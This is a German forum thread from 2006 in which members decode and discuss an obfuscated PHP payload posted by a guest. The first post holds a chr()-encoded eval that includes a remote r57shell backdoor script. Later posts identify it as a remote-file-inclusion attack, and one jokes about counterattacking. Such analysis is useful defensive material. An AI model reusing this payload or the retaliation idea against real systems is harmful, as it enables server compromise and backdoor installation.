Zum Inhalt wechseln


&&&&


  • Bitte melde dich an um zu Antworten
10 Antworten in diesem Thema

#1 Gast_h3ro1n@mail.ru_*

Gast_h3ro1n@mail.ru_*
  • Guests

Geschrieben 01 August 2006 - 07:43

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

#2 Rusch

Rusch

    Phantastonaut

  • FictionFantasy Moderator
  • PIPPIPPIPPIPPIP
  • 6.652 Beiträge
  • Geschlecht:männlich
  • Wohnort:München

Geschrieben 01 August 2006 - 07:51

Hm, was für ein cryptisches Posting. Ist das ein antikes Rätsel oder ein missglückter Spamversuch. Wahrscheinlich ein antiker Spamversuch. ;) :rofl1: :D

#3 Thomas Sebesta

Thomas Sebesta

    Biblionaut

  • Moderator
  • PIPPIPPIPPIPPIP
  • 3.301 Beiträge
  • Geschlecht:männlich
  • Wohnort:Neunkirchen/Austria

Geschrieben 01 August 2006 - 07:59

eindeutig ein Erstkontaktversuch eines AliensBITTE IN DEN TREAD ÜBER KONTAKTVERSUCHE VERSCHIEBEN!!!!GrußThomas

Thomas Sebesta/Neunkirchen/Austria

Blog zur Sekundärliteratur: http://sebesta-seklit.net/

Online-Bibliothek zur Sekundärliteratur: http://www.librarything.de/catalog/t.sebesta

Facebook-Gruppe: https://www.facebook...tik.ge/members/


#4 Darnok

Darnok

    Infonaut

  • Mitglieder
  • PIPPIP
  • 254 Beiträge
  • Wohnort:Dresden

Geschrieben 01 August 2006 - 08:27

Ich würde eher behaupten, dass da jemand versucht hat mit nicht-lateinischen Buchstaben zu spammen.

#5 yiyippeeyippeeyay

yiyippeeyippeeyay

    Interstellargestein

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 13.368 Beiträge
  • Geschlecht:männlich
  • Wohnort:Berlin

Geschrieben 01 August 2006 - 10:31

Es ist SPAM - der Code könnte Perl oder PHP sein. Wenn man die Zahlen in Klammern als ASCII-Zeichen interpretiert. kommt heraus:
include "http://rst.void.txt";
(Also Quatsch.) Ich denke das neue SPAMMENDE Mitglied will testen ob ein entspr. Roboter über sein Login einen ganzen Thread starten kann. Test leider gelungen...

/KB

Yay! SF-Dialog Ende März...
Senator: Und dies ist nun die Epoche der Laser?

Farmer: [..] Die Anzahl der Menschen auf der Erde, die voller Hass/Frustration/Gewalt sind, ist zuletzt furchterregend schnell gewachsen. Dazu kommt die riesige Gefahr, dass das hier in die Hände nur einer Gruppierung oder Nation fällt... (Schulterzucken.) Das hier ist zuviel Macht für eine Person oder Gruppe, in der Hoffnung dass sie vernünftig damit umgehen. Ich durfte nicht warten. Darum hab ich es jetzt in die Welt verstreut und kündige es so breit wie möglich an.

Senator: (erblasst, stockt) Wir werden das nicht überleben.

Farmer: Ich hoffe Sie irren sich, Senator! Ich hatte eben nur eine Sache sicher kapiert - dass wir weniger Chancen dazu morgen haben würden als heute.

(Leiter eines US-Congress-Kommittees vs. Erfinder des effektivsten Handlasers, den es je gab, grob übersetzt aus der 1. KG aus Best of Frank Herbert 1965-1970, im Sphere-Verlag, Sn. 38 & 39, by Herbert sr.)


#6 Dave

Dave

    Hamannaut

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 3.293 Beiträge
  • Geschlecht:männlich
  • Wohnort:Hamburg

Geschrieben 01 August 2006 - 11:18

Das h3ro1n@mail.ru die Rätselei ins Spekulation-Forum gepostet hat, hat ihn zumindest den Kopf gerettet.Vorläufig... :rofl1: ;)

Bearbeitet von Dave, 01 August 2006 - 11:19.


#7 yiyippeeyippeeyay

yiyippeeyippeeyay

    Interstellargestein

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 13.368 Beiträge
  • Geschlecht:männlich
  • Wohnort:Berlin

Geschrieben 01 August 2006 - 11:23

Ich halte Jonasens Analyse für richtig - ein Hackversuch um zu sehen ob man übers Board so etwas wie einen Trojaner auf den PCs der Threadleser einschleusen kann... (Oder ein IQ-Test den ich nicht bestanden habe! ;) Yay!)

/KB

Yay! SF-Dialog Ende März...
Senator: Und dies ist nun die Epoche der Laser?

Farmer: [..] Die Anzahl der Menschen auf der Erde, die voller Hass/Frustration/Gewalt sind, ist zuletzt furchterregend schnell gewachsen. Dazu kommt die riesige Gefahr, dass das hier in die Hände nur einer Gruppierung oder Nation fällt... (Schulterzucken.) Das hier ist zuviel Macht für eine Person oder Gruppe, in der Hoffnung dass sie vernünftig damit umgehen. Ich durfte nicht warten. Darum hab ich es jetzt in die Welt verstreut und kündige es so breit wie möglich an.

Senator: (erblasst, stockt) Wir werden das nicht überleben.

Farmer: Ich hoffe Sie irren sich, Senator! Ich hatte eben nur eine Sache sicher kapiert - dass wir weniger Chancen dazu morgen haben würden als heute.

(Leiter eines US-Congress-Kommittees vs. Erfinder des effektivsten Handlasers, den es je gab, grob übersetzt aus der 1. KG aus Best of Frank Herbert 1965-1970, im Sphere-Verlag, Sn. 38 & 39, by Herbert sr.)


#8 tichy

tichy

    Typonaut

  • Mitglieder
  • PIPPIPPIP
  • 487 Beiträge
  • Wohnort:Regensburg

Geschrieben 01 August 2006 - 13:31

Das ist ein Hacker-Angriff, zu welchem Zweck auch immer. Er versucht folgenden Code einzuschleusen:

include "http://rst.void.ru/d...57shell.txt";/*

Wenn man diese Datei aufruft (ungefährlich, ist in dieser Form eine reine Textdatei), sieht man eine Menge russischen PHP-Code, der u.a. versucht, auf die Datenbank zuzugreifen. Die Seite rst.void.ru listet eine große Menge von "exploits" auf, also von Methoden, wie man Sicherheitslücken diverser Software ausnutzen kann -- rein "for educational purpose only" natürlich. Ich halte das für einen ernstzunehmenden Angriff. -- tichy
.
.
.

#9 tichy

tichy

    Typonaut

  • Mitglieder
  • PIPPIPPIP
  • 487 Beiträge
  • Wohnort:Regensburg

Geschrieben 01 August 2006 - 13:52

Zusatzinfo: Das ist ein Backdoor-Script, googeln nach dem Dateinamen bringt eine große Menge einschlägiger Treffer. Anscheinend wird es unspezifisch auf alle möglichen Inputfelder losgelassen in der Hoffnung, dass es irgendwo greift -- das Content Management System Joomla beispielsweise ist anfällig: Klick. IPB ist in dieser Version anscheinend immun, denn hier hat er sich wohl verschluckt. -- tichy
.
.
.

#10 yiyippeeyippeeyay

yiyippeeyippeeyay

    Interstellargestein

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 13.368 Beiträge
  • Geschlecht:männlich
  • Wohnort:Berlin

Geschrieben 01 August 2006 - 14:44

Ich halte das für einen ernstzunehmenden Angriff.

Beitrag anzeigen

Danke, tichy. Macht jetzt auch mehr Sinn... Wo man nun den Webserver kennt, kann man den nicht wiederum angreifen - nur mal so als Dankeschön? ;)

/KB

Yay! SF-Dialog Ende März...
Senator: Und dies ist nun die Epoche der Laser?

Farmer: [..] Die Anzahl der Menschen auf der Erde, die voller Hass/Frustration/Gewalt sind, ist zuletzt furchterregend schnell gewachsen. Dazu kommt die riesige Gefahr, dass das hier in die Hände nur einer Gruppierung oder Nation fällt... (Schulterzucken.) Das hier ist zuviel Macht für eine Person oder Gruppe, in der Hoffnung dass sie vernünftig damit umgehen. Ich durfte nicht warten. Darum hab ich es jetzt in die Welt verstreut und kündige es so breit wie möglich an.

Senator: (erblasst, stockt) Wir werden das nicht überleben.

Farmer: Ich hoffe Sie irren sich, Senator! Ich hatte eben nur eine Sache sicher kapiert - dass wir weniger Chancen dazu morgen haben würden als heute.

(Leiter eines US-Congress-Kommittees vs. Erfinder des effektivsten Handlasers, den es je gab, grob übersetzt aus der 1. KG aus Best of Frank Herbert 1965-1970, im Sphere-Verlag, Sn. 38 & 39, by Herbert sr.)


#11 rockmysoul67

rockmysoul67

    Temponaut

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 2.008 Beiträge

Geschrieben 01 August 2006 - 15:47

;) GrÃfÆ'Ã,¼sse???


Besucher die dieses Thema lesen: 0

Mitglieder: 0, Gäste: 0, unsichtbare Mitglieder: 0